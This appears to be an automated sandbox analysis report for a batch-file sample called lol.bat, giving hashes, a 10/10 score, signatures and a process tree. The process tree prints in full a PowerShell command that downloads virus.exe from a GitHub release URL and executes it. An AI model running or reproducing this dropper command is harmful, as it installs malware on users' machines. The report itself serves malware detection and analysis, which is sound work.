Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10/12/2024, 22:58
Static task
static1
Behavioral task
behavioral1
Sample
lol.bat
Resource
win7-20240903-en
4 signatures
150 seconds
General
-
Target
lol.bat
-
Size
272B
-
MD5
bbcb8363229c568f8a50a6e06e90d27c
-
SHA1
bb2cedb7ab72648e4b63940a0f2de83d2d34c447
-
SHA256
bb7ad16471d922ca93fb343372dba6034cfdd536831a395e4054c7d9d2ff6664
-
SHA512
fe230e3253930c00ac07ec5ea2fe4e2756dcd725a17ccdb9d3c1fe502ffa6ddb65c955ac3818c2de5b2a62faaaa6ad6e34ac767475288ee39bb59018f8f2236c
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe
Signatures
-
pid Process 2700 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2700 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2644 wrote to memory of 2656 2644 cmd.exe 31 PID 2644 wrote to memory of 2656 2644 cmd.exe 31 PID 2644 wrote to memory of 2656 2644 cmd.exe 31 PID 2656 wrote to memory of 2700 2656 cmd.exe 32 PID 2656 wrote to memory of 2700 2656 cmd.exe 32 PID 2656 wrote to memory of 2700 2656 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\lol.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\system32\cmd.execmd /k powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"C:\\Users\\$env:UserName\\AppData\\Local\\Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"2⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"C:\\Users\\$env:UserName\\AppData\\Local\\Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-